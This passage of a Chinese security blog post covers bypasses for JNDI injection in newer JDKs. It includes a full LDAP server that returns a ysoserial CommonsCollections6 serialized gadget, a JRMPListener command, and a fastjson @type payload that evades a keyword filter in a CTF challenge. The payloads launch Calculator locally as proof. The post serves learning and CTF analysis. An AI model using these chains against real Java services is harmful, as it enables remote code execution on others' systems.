<p>翻了一些资料还有一些其他的类符合条件可以作为beanClass注入到BeanFactory中实现利用，比如<a href="https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" target="_blank" rel="noopener">Orange师傅的Jenkins漏洞实现利用</a>，先挖个坑。</p>
</blockquote>
<h3 id="利用LDAP返回序列化数据，触发本地Gadget绕过高版本限制"><a href="#利用LDAP返回序列化数据，触发本地Gadget绕过高版本限制" class="headerlink" title="利用LDAP返回序列化数据，触发本地Gadget绕过高版本限制"></a>利用LDAP返回序列化数据，触发本地Gadget绕过高版本限制</h3><p>目录是一种分布式数据库，目录服务是由目录数据库和一套访问协议组成的系统。LDAP全称是轻量级目录访问协议（The Lightweight Directory Access Protocol），它提供了一种查询、浏览、搜索和修改互联网目录数据的机制，运行在TCP/IP协议栈之上，基于C/S架构。除了RMI服务之外，JNDI也可以与LDAP目录服务进行交互，Java对象在LDAP目录中也有多种存储形式：</p>
<ul>
<li>Java序列化</li>
<li>JNDI Reference</li>
<li>Marshalled对象</li>
<li>Remote Location (已弃用)<br>LDAP可以为存储的Java对象指定多种属性：</li>
<li>javaCodeBase</li>
<li>objectClass</li>
<li>javaFactory</li>
<li>javaSerializedData</li>
</ul>
<p>这里 javaCodebase 属性可以指定远程的URL，这样黑客可以控制反序列化中的class，通过JNDI Reference的方式进行利用。但是高版本JVM对Reference Factory远程加载类进行了安全限制，JVM不会信任LDAP对象反序列化过程中加载的远程类。</p>
<p>此时，攻击者仍然可以利用受害者本地CLASSPATH中存在漏洞的反序列化Gadget达到绕过限制执行命令的目的。LDAP Server除了使用JNDI Reference进行利用之外，还支持直接返回一个对象的序列化数据。如果Java对象的 <code>javaSerializedData</code> 属性值不为空，则客户端的 <code>obj.decodeObject()</code> 方法就会对这个字段的内容进行反序列化。</p>
<p><img src="https://i.loli.net/2020/02/04/Qb3VgFe1YKwqpRT.jpg" alt="-w1574"></p>
<p>假设客户端存在有漏洞的Apache-Commons-Collections-3.1，ldap服务端返回一个ysoserial生成的Exp：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar CommonsCollections6 &apos;/Applications/Calculator.app/Contents/MacOS/Calculator&apos;|base64</span><br></pre></td></tr></table></figure></p>
<p>ldap服务端代码：<br><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.unboundid.ldap.listener.InMemoryDirectoryServer;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.ldap.listener.InMemoryListenerConfig;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.ldap.sdk.Entry;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.ldap.sdk.LDAPException;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.ldap.sdk.LDAPResult;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.ldap.sdk.ResultCode;</span><br><span class="line"><span class="keyword">import</span> com.unboundid.util.Base64;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.net.ServerSocketFactory;</span><br><span class="line"><span class="keyword">import</span> javax.net.SocketFactory;</span><br><span class="line"><span class="keyword">import</span> javax.net.ssl.SSLSocketFactory;</span><br><span class="line"><span class="keyword">import</span> java.net.InetAddress;</span><br><span class="line"><span class="keyword">import</span> java.net.MalformedURLException;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"><span class="keyword">import</span> java.text.ParseException;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">LdapServer</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> String LDAP_BASE = <span class="string">"dc=example,dc=com"</span>;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span> <span class="params">(String[] args)</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">        String url = <span class="string">"http://127.0.0.1:80/#Exploit"</span>;</span><br><span class="line">        <span class="keyword">int</span> port = <span class="number">1389</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            InMemoryDirectoryServerConfig config = <span class="keyword">new</span> InMemoryDirectoryServerConfig(LDAP_BASE);</span><br><span class="line">            config.setListenerConfigs(<span class="keyword">new</span> InMemoryListenerConfig(</span><br><span class="line">                    <span class="string">"listen"</span>,</span><br><span class="line">                    InetAddress.getByName(<span class="string">"0.0.0.0"</span>),</span><br><span class="line">                    port,</span><br><span class="line">                    ServerSocketFactory.getDefault(),</span><br><span class="line">                    SocketFactory.getDefault(),</span><br><span class="line">                    (SSLSocketFactory) SSLSocketFactory.getDefault()));</span><br><span class="line"></span><br><span class="line">            config.addInMemoryOperationInterceptor(<span class="keyword">new</span> OperationInterceptor(<span class="keyword">new</span> URL(url)));</span><br><span class="line">            InMemoryDirectoryServer ds = <span class="keyword">new</span> InMemoryDirectoryServer(config);</span><br><span class="line">            System.out.println(<span class="string">"Listening on 0.0.0.0:"</span> + port);</span><br><span class="line">            ds.startListening();</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">catch</span> ( Exception e ) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="class"><span class="keyword">class</span> <span class="title">OperationInterceptor</span> <span class="keyword">extends</span> <span class="title">InMemoryOperationInterceptor</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">private</span> URL codebase;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="title">OperationInterceptor</span> <span class="params">( URL cb )</span> </span>&#123;</span><br><span class="line">            <span class="keyword">this</span>.codebase = cb;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">processSearchResult</span> <span class="params">( InMemoryInterceptedSearchResult result )</span> </span>&#123;</span><br><span class="line">            String base = result.getRequest().getBaseDN();</span><br><span class="line">            Entry e = <span class="keyword">new</span> Entry(base);</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                sendResult(result, base, e);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">catch</span> ( Exception e1 ) &#123;</span><br><span class="line">                e1.printStackTrace();</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">     <span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">sendResult</span> <span class="params">( InMemoryInterceptedSearchResult result, String base, Entry e )</span> <span class="keyword">throws</span> LDAPException, MalformedURLException </span>&#123;</span><br><span class="line">            URL turl = <span class="keyword">new</span> URL(<span class="keyword">this</span>.codebase, <span class="keyword">this</span>.codebase.getRef().replace(<span class="string">'.'</span>, <span class="string">'/'</span>).concat(<span class="string">".class"</span>));</span><br><span class="line">            System.out.println(<span class="string">"Send LDAP reference result for "</span> + base + <span class="string">" redirecting to "</span> + turl);</span><br><span class="line">            e.addAttribute(<span class="string">"javaClassName"</span>, <span class="string">"Exploit"</span>);</span><br><span class="line">            String cbstring = <span class="keyword">this</span>.codebase.toString();</span><br><span class="line">            <span class="keyword">int</span> refPos = cbstring.indexOf(<span class="string">'#'</span>);</span><br><span class="line">            <span class="keyword">if</span> ( refPos &gt; <span class="number">0</span> ) &#123;</span><br><span class="line">                cbstring = cbstring.substring(<span class="number">0</span>, refPos);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// Payload1: Return Evil Reference Factory</span></span><br><span class="line"><span class="comment">//            e.addAttribute("javaCodeBase", cbstring);</span></span><br><span class="line"><span class="comment">//            e.addAttribute("objectClass", "javaNamingReference");</span></span><br><span class="line"><span class="comment">//            e.addAttribute("javaFactory", this.codebase.getRef());</span></span><br><span class="line"></span><br><span class="line">            <span class="comment">//Payload2: Return Evil Serialized Gadget</span></span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                <span class="comment">// java -jar ysoserial.jar CommonsCollections6 '/Applications/Calculator.app/Contents/MacOS/Calculator'|base64</span></span><br><span class="line">                e.addAttribute(<span class="string">"javaSerializedData"</span>, Base64.decode(<span class="string">"rO0ABXNyABFqYX..."</span>));</span><br><span class="line">            &#125; <span class="keyword">catch</span> (ParseException e1) &#123;</span><br><span class="line">                e1.printStackTrace();</span><br><span class="line">            &#125;</span><br><span class="line">            result.sendSearchEntry(e);</span><br><span class="line">            result.setResult(<span class="keyword">new</span> LDAPResult(<span class="number">0</span>, ResultCode.SUCCESS));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>jdk8u201测试结果：<br><img src="https://i.loli.net/2020/02/04/jHPDzuVL4n1mZyK.jpg" alt="-w1415"></p>
<p>这种绕过方式需要利用一个本地的反序列化利用链，来结合JNDI注入的入口来利用。</p>
<h3 id="利用JRMP触发本地gadget"><a href="#利用JRMP触发本地gadget" class="headerlink" title="利用JRMP触发本地gadget"></a>利用JRMP触发本地gadget</h3><p>JRMP(Java Remote Method Protocol)，Java远程方法协议，类比于HTTP协议是基于TCP/IP协议，RMI即基于JRMP协议。JRMP规定了RMI通信过程的数据格式等。</p>
<p>以<a href="https://mp.weixin.qq.com/s?__biz=MzU4MTg1NzAzMA==&amp;mid=2247483796&amp;idx=1&amp;sn=ce4249ba61d7f402a1211e508f83d2b4&amp;chksm=fd407bfdca37f2ebd51202f8221d320ccd639fd48d6a2adcb53c17ccb143fc3f037e6198662a&amp;mpshare=1&amp;scene=23&amp;srcid=&amp;sharer_sharetime=1577970121763&amp;sharer_shareid=b6a93c2ad862a6198898de9305c515e1#rd" target="_blank" rel="noopener">空指针公开赛CTF-treasure</a>这题为例，题目源码：<a href="media/15806219737687/treasure.zip">treasure</a><br>高版本jdk8u201(默认不开远程类加载)，fastjson1.2.61，标准的解析json：me/firesun/treasure/controller/SubmitController.java<br><img src="https://i.loli.net/2020/02/05/BIoitgfVF43vQJl.jpg" alt="-w1273"><br>SubmitController.java中开启了autotype：<br><img src="https://i.loli.net/2020/02/05/gcRSa4mTxC2uydb.jpg" alt="-w1037"><br>中间件中LogAspect.java检测type关键字，这里用<code>\x</code>16进制编码绕就行了，在之前的文章<a href="mweblib://15802654101358" target="_blank" rel="noopener">Fastjson 反序列化触发流程分析</a>中有分析。<br><img src="https://i.loli.net/2020/02/05/ZSPQ5odTsyHzuKl.jpg" alt="-w1102"></p>
<p>接着就是寻找JNDI注入点，全局搜<code>lookup(</code>：<br><img src="https://i.loli.net/2020/02/05/f965HStPoRhFDdM.jpg" alt="-w1269"></p>
<blockquote>
<p>还是有点问题，搜不了class文件，可以mvn拉下源码全局搜<br>/org/apache/commons/proxy/provider/remoting/RmiProvider.class中有一处<code>lookup</code>函数调用：<br><img src="https://i.loli.net/2020/02/05/eMHhzGxVlRsq4iS.jpg" alt="-w1376"><br>参数<code>name</code>利用fastjson解析json数据自动调用<code>setXX</code>方法设置：<br><img src="https://i.loli.net/2020/02/05/jgzIwdaCo2qHt6O.jpg" alt="-w716"><br>再看看reg变量: RmiProvider.class#getRegistry，也就是rmi的客户端实现</p>
</blockquote>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RmiProvider</span> <span class="keyword">implements</span> <span class="title">ObjectProvider</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> String host = <span class="string">"localhost"</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">int</span> port = <span class="number">1099</span>;</span><br><span class="line">    <span class="comment">//...</span></span><br><span class="line">    <span class="function"><span class="keyword">private</span> Registry <span class="title">getRegistry</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">this</span>.clientSocketFactory != <span class="keyword">null</span> ? LocateRegistry.getRegistry(<span class="keyword">this</span>.host, <span class="keyword">this</span>.port, <span class="keyword">this</span>.clientSocketFactory) : LocateRegistry.getRegistry(<span class="keyword">this</span>.host, <span class="keyword">this</span>.port);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (RemoteException var2) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> ObjectProviderException(<span class="string">"Unable to locate registry at "</span> + <span class="keyword">this</span>.host + <span class="string">":"</span> + <span class="keyword">this</span>.port + <span class="string">"."</span>, var2);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//...</span></span><br></pre></td></tr></table></figure>
<p>构造一个JRMP Server，利用RMI触发，在依赖库里引用了<code>commons-collections3.2</code>,使用ysoserial的commonscollections5：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1088 CommonsCollections5 &apos;/Applications/Calculator.app/Contents/MacOS/Calculator&apos;</span><br></pre></td></tr></table></figure></p>
<p>submit路由发送：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;@\u0074ype&quot;:&quot;org.apache.commons.proxy.provider.remoting.RmiProvider&quot;,&quot;host&quot;:&quot;127.0.0.1&quot;,&quot;port&quot;:&quot;1088&quot;,&quot;name&quot;:&quot;Object&quot;&#125;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://i.loli.net/2020/02/05/uCjneMqth29IS3D.jpg" alt="-w1398"></p>
<blockquote>
<p>同样也要求classpath中的类有反序列化漏洞，借助Registry的入口实现命令执行。</p>
</blockquote>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>文章研究了多个jdk版本的多种jndi注入方式，以及高版本利用限制分析和绕过方式，收获颇为丰富。</p>
<p>参考文章：</p>
<ul>
<li><a href="https://kingx.me/Exploit-Java-Deserialization-with-RMI.html" target="_blank" rel="noopener">kingx: 深入理解JNDI注入与Java反序列化漏洞利用</a></li>
<li><a href="https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html" target="_blank" rel="noopener">kingx: 如何绕过高版本JDK的限制进行JNDI注入利用</a></li>
<li><a href="https://www.veracode.com/blog/research/exploiting-jndi-injections-java" target="_blank" rel="noopener">Exploiting JNDI Injections in Java</a></li>
<li><a href="https://www.cnblogs.com/Welk1n/p/11066397.html" target="_blank" rel="noopener">Welkin: 浅析JNDI注入Bypass</a></li>
</ul>

      
    </div>

    

    
    
    

	
    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Passer6y</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://0day.design/2020/02/04/JNDI注入高版本jdk绕过学习/" title="JNDI注入高版本jdk绕过学习">http://0day.design/2020/02/04/JNDI注入高版本jdk绕过学习/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>true</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Java/" rel="tag"><i class="fa fa-tag"></i> Java</a>
          
            <a href="/tags/漏洞分析/" rel="tag"><i class="fa fa-tag"></i> 漏洞分析</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/02/01/fastjson拒绝服务攻击分析/" rel="next" title="FastJson 拒绝服务攻击分析 (<=1.2.59)">
                <i class="fa fa-chevron-left"></i> FastJson 拒绝服务攻击分析 (<=1.2.59)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/02/11/WebLogic-XMLDecoder反序列化分析/" rel="prev" title="WebLogic-XMLDecoder反序列化分析">
                WebLogic-XMLDecoder反序列化分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/21.jpg"
                alt="Passer6y" />
            
              <p class="site-author-name" itemprop="name">Passer6y</p>
              <p class="site-description motion-element" itemprop="description">A salty fish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives">
                
                    <span class="site-state-item-count">39</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/passer6y" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:passer6y@d0g3.cn" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://hpdoger.cn/" title="Hpdoger" target="_blank">Hpdoger</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://Hu3sky.github.io" title="Hu3sky" target="_blank">Hu3sky</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.0akarma.com/" title="0akarma" target="_blank">0akarma</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/H4lo" title="H4lo" target="_blank">H4lo</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/P1g3/" title="P1g3" target="_blank">P1g3</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://patrilic.top/" title="Patrilic" target="_blank">Patrilic</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ph0rse.me/" title="Ph0rse" target="_blank">Ph0rse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://threezh1.com/" title="Threezh1" target="_blank">Threezh1</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#RMI-Remote-Object-Payload-限制较多，不常使用"><span class="nav-number">1.</span> <span class="nav-text">RMI Remote Object Payload (限制较多，不常使用)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RMI-JNDI-Reference-Payload"><span class="nav-number">2.</span> <span class="nav-text">RMI + JNDI Reference Payload</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#触发过程分析"><span class="nav-number">2.1.</span> <span class="nav-text">触发过程分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#低版本8u73测试"><span class="nav-number">2.1.1.</span> <span class="nav-text">低版本8u73测试</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#高版本8u201测试"><span class="nav-number">2.1.2.</span> <span class="nav-text">高版本8u201测试</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#LDAP-JNDI-Reference-Payload"><span class="nav-number">3.</span> <span class="nav-text">LDAP + JNDI Reference Payload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#绕过JDK-8u191-等高版本限制"><span class="nav-number">4.</span> <span class="nav-text">绕过JDK 8u191+等高版本限制</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#利用本地Class作为Reference-Factory绕过高版本限制"><span class="nav-number">4.1.</span> <span class="nav-text">利用本地Class作为Reference Factory绕过高版本限制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用LDAP返回序列化数据，触发本地Gadget绕过高版本限制"><span class="nav-number">4.2.</span> <span class="nav-text">利用LDAP返回序列化数据，触发本地Gadget绕过高版本限制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用JRMP触发本地gadget"><span class="nav-number">4.3.</span> <span class="nav-text">利用JRMP触发本地gadget</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小结"><span class="nav-number">5.</span> <span class="nav-text">小结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Passer6y</span>

  

  
</div>









<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共83.5k字</span>
</div>

<span id="busuanzi_container_site_pv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
























  



  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/gh/theme-next/theme-next-reading-progress@1/reading_progress.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: false,
        appId: '3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz',
        appKey: 'TDRlM3HCI03SteHoOtVxJIMS',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
